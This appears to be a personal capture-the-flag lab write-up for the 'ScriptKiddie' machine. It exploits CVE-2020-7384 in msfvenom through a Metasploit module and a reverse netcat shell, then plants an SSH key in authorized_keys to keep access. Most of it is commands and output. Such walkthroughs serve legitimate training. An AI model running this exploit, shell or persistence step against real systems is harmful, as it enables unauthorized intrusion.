InfoSec LAB

ScriptKiddie_Exploitation

Created: 5 min read

Command Injection

The target web application is hosting a series of security tools online. One of the sections, payloads, uses the msfvenom tool to generate a payload and it appears to be vulnerable to CVE-2020-7384

Metasploit Framework’s msfvenom is vulnerable to a command injection vulnerability when the user provides a crafted APK file to use as an Android payload template. A “template” file in this context is an existing APK file, within which an Android payload will be embedded.

The vulnerability affects Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0

while i haven’t confirmed the version of the target metasploit framework instance, it is highly likely to be vulnerable as the most recent release was made is 6.3.5 as of March 2, 2023

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ msfconsole

I first need to start msfconsole

msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp

I will be using theunix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9999
LPORT => 9999

I will then set the payload option to be cmd/unix/reverse_netcat

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options
 
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name
 
 
Payload options (cmd/unix/reverse_netcat):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port
 
   **DisablePayloadHandler: True   (no handler will be created!)**
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
 
View the full module info with the info, or info -d command.

Overall, it looks like this.

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
 
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk

Running this will generate a APK template; msf.apk, that contains the reverse shell payload

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ mv /home/kali/.msf4/local/msf.apk .

I will move the APK file to the current working directory

Uploading the generated APK file It’s important to set the os parameter to android The lhost parameter doesn’t matter

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.226] 40094
whoami
kid
hostname
scriptkiddie
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.226  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:8437  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8437  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:84:37  txqueuelen 1000  (Ethernet)
        RX packets 45  bytes 7302 (7.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36  bytes 7179 (7.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 456  bytes 32888 (32.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 456  bytes 32888 (32.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the kid user via exploiting CVE-2020-7384

SSH

Although the exploit has been successful, I find it rather unstable as the web server appeared to be unable to handle such operations in an efficient manner. So it might have worked flawlessly the first time, but that was not the case when I tried again for the 2nd and 3rd time.

kid@scriptkiddie:~/.ssh$ ll
total 8.0K
4.0K drwx------  2 kid kid 4.0K Feb 10  2021 .
   0 -rw-rw-r--  1 kid kid    0 Feb 10  2021 authorized_keys
4.0K drwxr-xr-x 11 kid kid 4.0K Feb  3  2021 ..

Since there is a SSH file, I will just write my own SSH key to it so that I can connect to the target via SSH

kid@scriptkiddie:~/.ssh$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /home/kid/.ssh/authorized_keys

Done

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ ssh kid@$IP -i ~/.ssh/id_ed25519
The authenticity of host '10.10.10.226 (10.10.10.226)' can't be established.
ed25519 key fingerprint is sha256:PJE5qFlR+iWt9MI6zk2i3lz3W/pLGZQ1+iq0XiCzpJQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.226' (ED25519) to the list of known hosts.
enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of fri mar 31 08:25:31 UTC 2023
 
  system load:             0.08
  usage of /:              29.3% of 17.59GB
  memory usage:            7%
  swap usage:              0%
  processes:               223
  users logged in:         0
  ipv4 address for ens160: 10.10.10.226
  ipv6 address for ens160: dead:beef::250:56ff:feb9:8437
 
 
1 update can be installed immediately.
1 of these updates is a security update.
to see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
 
last login: Wed Feb  3 12:07:35 2021 from 10.10.14.4
kid@scriptkiddie:~$ whoami
kid
kid@scriptkiddie:~$ hostname
scriptkiddie
kid@scriptkiddie:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.226  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:8437  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8437  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:84:37  txqueuelen 1000  (Ethernet)
        RX packets 377  bytes 38285 (38.2 KB)
        RX errors 0  dropped 24  overruns 0  frame 0
        TX packets 169  bytes 37789 (37.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1432  bytes 102256 (102.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1432  bytes 102256 (102.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Nice. Now, I can always get back to it if I ever lose the connection

Interactive Graph View

Backlinks